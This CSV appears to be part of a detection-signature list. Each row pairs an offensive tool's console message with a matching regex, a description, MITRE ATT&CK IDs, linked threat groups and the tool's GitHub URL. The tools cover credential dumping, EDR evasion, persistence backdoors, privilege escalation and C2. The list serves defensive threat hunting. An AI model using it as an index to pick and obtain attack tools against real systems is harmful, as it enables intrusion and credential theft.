"*[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!*",".{0,1000}\[\-\]\sGot\sRPC_ACCESS_DENIED!!\sEfsRpcOpenFileRaw\sis\sprobably\sPATCHED!.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","#content","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","13017"
"*[-] Hijacking failed!*",".{0,1000}\[\-\]\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13018"
"*[-] Inveigh Relay session *",".{0,1000}\[\-\]\sInveigh\sRelay\ssession\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","#content","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","13019"
"*[-] kernel not vulnerable*",".{0,1000}\[\-\]\skernel\snot\svulnerable.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","#content","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13021"
"*[-] No Kerberoastable accounts found*",".{0,1000}\[\-\]\sNo\sKerberoastable\saccounts\sfound.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","13022"
"*[-] NtAllocateVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtAllocateVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13023"
"*[-] NtProtectVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtProtectVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13024"
"*[-] NtWaitForSingleObject Hooked*",".{0,1000}\[\-\]\sNtWaitForSingleObject\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13025"
"*[-] Removed PSRemote Collection*",".{0,1000}\[\-\]\sRemoved\sPSRemote\sCollection.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#content","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","13026"
"*[-] Seems like we killed auditd. Ooopsie :D*",".{0,1000}\[\-\]\sSeems\slike\swe\skilled\sauditd\.\sOoopsie\s\:D.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","#content","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","13027"
"*[-] Shellcode is larger than RX section*",".{0,1000}\[\-\]\sShellcode\sis\slarger\sthan\sRX\ssection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13028"
"*[-] Stopping here, before grabbing the Hash*",".{0,1000}\[\-\]\sStopping\shere,\sbefore\sgrabbing\sthe\sHash.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","0","#content","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","13029"
"*[-] Unable to Read LSASS Dump*",".{0,1000}\[\-\]\sUnable\sto\sRead\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13030"
"*[+] - Bashrc persistence added!*",".{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13031"
"*[+] - Configuring ~/.bashrc for persistence ... *",".{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13032"
"*[+] - Linux header / Message Of The Day Persistence*",".{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13033"
"*[+] - Rootkit Configuration*",".{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13034"
"*[+] - Rootkit configured successfully*",".{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13035"
"*[+] - Setting up cronjobs for persistence ... *",".{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13036"
"*[+] - Systemd Root Level Service successfully configued!*",".{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13037"
"*[+] $bin backdoored successful*",".{0,1000}\[\+\]\s\$bin\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13038"
"*[+] $binary backdoored successful*",".{0,1000}\[\+\]\s\$binary\sbackdoored\ssuccessful.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13039"
"*[+] /etc/passwd persistence established!*",".{0,1000}\[\+\]\s\/etc\/passwd\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13040"
"*[+] [HELL HALL] pAddress : *",".{0,1000}\[\+\]\s\[HELL\sHALL\]\spAddress\s\:\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","#content","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","13041"
"*[+] \u57fa\u4e8esyswhispers\u7684shellcode\u52a0\u8f7d\u5668*",".{0,1000}\[\+\]\s\\u57fa\\u4e8esyswhispers\\u7684shellcode\\u52a0\\u8f7d\\u5668.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13042"
"*[+] \u68c0\u6d4b\u5230Stageless payload*",".{0,1000}\[\+\]\s\\u68c0\\u6d4b\\u5230Stageless\spayload.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13043"
"*[+] Added {altsecid} to {target}*",".{0,1000}\[\+\]\sAdded\s\{altsecid\}\sto\s\{target\}.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#content","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","13044"
"*[+] Adding your DLL to the LSA Security Packages registry key*",".{0,1000}\[\+\]\sAdding\syour\sDLL\sto\sthe\sLSA\sSecurity\sPackages\sregistry\skey.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13045"
"*[+] AMSI Bypassed!*",".{0,1000}\[\+\]\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#content","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","13046"
"*[+] APT persistence establis*",".{0,1000}\[\+\]\sAPT\spersistence\sestablis.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13047"
"*[+] Arbitrary Directory Creation to SYSTEM Shell technique !*",".{0,1000}\[\+\]\sArbitrary\sDirectory\sCreation\sto\sSYSTEM\sShell\stechnique\s!.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13048"
"*[+] Ask4Creds Loaded*",".{0,1000}\[\+\]\sAsk4Creds\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13049"
"*[+] AS-REQ w/o preauth successful!*",".{0,1000}\[\+\]\sAS\-REQ\sw\/o\spreauth\ssuccessful!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13050"
"*[+] At job persistence establish*",".{0,1000}\[\+\]\sAt\sjob\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13051"
"*[+] Attack aborted. Exiting*",".{0,1000}\[\+\]\sAttack\saborted\.\sExiting.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","#content","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13052"
"*[+] Attempting DCOM NTLM relaying with CLSID*",".{0,1000}\[\+\]\sAttempting\sDCOM\sNTLM\srelaying\swith\sCLSID.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13053"
"*[+] Attempting NP impersonation using method EfsRpc to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sEfsRpc\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13054"
"*[+] Attempting NP impersonation using method PrintSpoofer to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sPrintSpoofer\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13055"
"*[+] Attempting SSRF*",".{0,1000}\[\+\]\sAttempting\sSSRF.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#content","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","13056"
"*[+] Attempting to call the target EXE from the mock directory*",".{0,1000}\[\+\]\sAttempting\sto\scall\sthe\starget\sEXE\sfrom\sthe\smock\sdirectory.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13057"
"*[+] auditd patched successfully*",".{0,1000}\[\+\]\sauditd\spatched\ssuccessfully.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","#content","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","13058"
"*[+] Authorized_keys persistence establish*",".{0,1000}\[\+\]\sAuthorized_keys\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13059"
"*[+] Auto-generating Pyramid config for modules and agents*",".{0,1000}\[\+\]\sAuto\-generating\sPyramid\sconfig\sfor\smodules\sand\sagents.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13060"
"*[+] Back to C&C Console*",".{0,1000}\[\+\]\sBack\sto\sC\&C\sConsole.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","#content","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13061"
"*[+] Backdoor user persistence establish*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13062"
"*[+] Backdoor user persistence established!*",".{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13063"
"*[+] Backdoored existing 7zip with specified input file*",".{0,1000}\[\+\]\sBackdoored\sexisting\s7zip\swith\sspecified\sinput\sfile.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13064"
"*[+] Backdoored existing ISO *",".{0,1000}\[\+\]\sBackdoored\sexisting\sISO\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13065"
"*[+] Backdoored existing MSI *",".{0,1000}\[\+\]\sBackdoored\sexisting\sMSI\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13066"
"*[+] Backdoored existing VHD *",".{0,1000}\[\+\]\sBackdoored\sexisting\sVHD\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#content","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","13067"
"*[+] Bind shell persistence establish*",".{0,1000}\[\+\]\sBind\sshell\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13068"
"*[+] Bof replay:*",".{0,1000}\[\+\]\sBof\sreplay\:.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","#content","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","13069"
"*[+] Build pupysh environment *",".{0,1000}\[\+\]\sBuild\spupysh\senvironment\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#content","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","13070"
